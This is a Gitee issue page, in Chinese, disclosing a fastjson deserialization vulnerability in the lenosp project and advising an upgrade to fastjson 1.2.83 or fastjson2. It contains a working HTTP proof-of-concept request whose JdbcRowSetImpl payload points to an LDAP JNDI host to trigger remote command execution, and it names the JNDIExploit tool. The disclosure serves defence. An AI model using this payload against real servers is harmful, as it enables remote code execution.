1.2K Star 5.9K Fork 2.2K

GVP郑州程序员 / lenosp

 / 详情

反序列化漏洞

待办的
创建于  
2024-01-18 17:08

由于系统中使用的fastjson版本过低,导致存在反序列化漏洞:
漏洞版本
漏洞触发点如下:
触发点

漏洞POC:
POST /service/model/1/save HTTP/1.1
Host: localhost:8081
Cookie: JSESSIONID=1b7c1461-8732-446c-8426-528ebc8890e2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 276

{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://0.0.0.0:1389/Basic/Command/calc",
"autoCommit":true
}
}
漏洞复现:
案例中使用的JNDI注入工具地址:https://github.com/WhiteHSBG/JNDIExploit
输入图片说明
输入图片说明

修复建议:
建议升级到fastjson 1.2.83 或者fastjson2

评论 (0)

by_yexing 创建了任务
by_yexing 修改了描述
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
8674532 by yexing 1705565218
Java
1
https://gitee.com/zzdevelop/lenosp.git
git@gitee.com:zzdevelop/lenosp.git
zzdevelop
lenosp
lenosp

搜索帮助